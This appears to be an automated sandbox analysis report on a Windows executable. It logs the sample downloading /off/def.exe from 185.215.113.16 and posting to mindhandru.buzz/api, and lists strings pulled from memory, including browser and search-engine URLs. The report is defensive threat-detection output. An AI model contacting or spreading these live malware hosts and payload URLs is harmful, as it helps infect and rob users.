Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz

Source: 0zBsv1tnt4.exe	String found in binary or memory: http://185.215.113.16/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/O
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeGd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeSd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1870836699.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeeWebKit/537.36
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686542592.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643183119.00000000014CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft2_
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_112.6.dr	String found in binary or memory: http://schema.org/Organization
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_112.6.dr, chromecache_89.6.dr, chromecache_122.6.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_112.6.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_112.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_112.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/nschonni
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_112.6.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1537563256.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/==
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1591109396.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1598062166.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/Cl
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/DataA4
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/P)
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564938918.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1565469827.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564296751.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/aB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/d
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/tC
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1626048164.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/wK
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000003.1597724019.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1597829853.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api;WU
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.00000000014EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/apiz
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.6.dr	String found in binary or memory: https://schema.org
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_101.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566815903.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49714 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: 0zBsv1tnt4.exe	Static PE information: section name:
Source: 0zBsv1tnt4.exe	Static PE information: section name: .rsrc
Source: 0zBsv1tnt4.exe	Static PE information: section name: .idata

Detected potential crypto function

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009658D5	0_2_009658D5
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095B1AF	0_2_0095B1AF
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00989280	0_2_00989280
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00973B50	0_2_00973B50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097D34A	0_2_0097D34A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00977440	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00990460	0_2_00990460
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098C5A0	0_2_0098C5A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00971D00	0_2_00971D00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00990D20	0_2_00990D20
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095E687	0_2_0095E687
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00988EA0	0_2_00988EA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00958600	0_2_00958600
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095CE45	0_2_0095CE45
